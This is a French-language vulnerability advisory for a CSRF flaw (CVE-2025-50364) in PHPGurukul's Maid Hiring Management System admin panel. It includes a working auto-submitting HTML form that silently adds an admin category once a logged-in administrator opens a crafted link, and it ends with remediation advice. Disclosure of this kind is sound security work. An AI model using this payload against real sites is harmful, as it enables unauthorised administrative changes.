
Preuve de concept d'exploitation CSRF ciblant CVE-2025-50364 dans PHPGurukul Maid Hiring Management System v1.0 qui ajoute des catégories administrateur arbitraires via un formulaire HTML conçu à cet effet.
Nom du projet et URL du dépôt : Système de gestion d'embauche de domestiques utilisant PHP et MySQL
Type de vulnérabilité : Falsification de requête côté client
Version(s) concernée(s) : v1.0
💣Description de la vulnérabilité : Une vulnérabilité de type Cross-Site Request Forgery (CSRF) existe dans le panneau d'administration du système de gestion d'embauche de PHPGurukul, permettant à un attaquant d'ajouter des catégories d'embauche arbitraires en trompant un administrateur authentifié pour qu'il visite un site malveillant. Cela peut entraîner une pollution des données et des modifications non autorisées au niveau administrateur.
👩💻Impact : Création non autorisée de catégories
🛜Preuve de concept (PoC)
1)Il existait une fonctionnalité d'ajout de catégorie où seul un administrateur authentifié pouvait ajouter une catégorie.
2)Code HTML pour envoyer une requête POST au point de terminaison /admin/add-category.php
CSRF-POC

<html>
<body>
<form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
<input type="hidden" name="catname" value="CSRF-POC" />
<input type="hidden" name="submit" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
3)Utilisez le code HTML et créez une URL malveillante.
4)Après que l'administrateur a cliqué sur le lien, une nouvelle catégorie sera ajoutée.

Recommandation : Implémentez des jetons CSRF dans les formulaires d'administration, imposez les cookies SameSite et validez l'origine de la requête pour empêcher les actions non autorisées.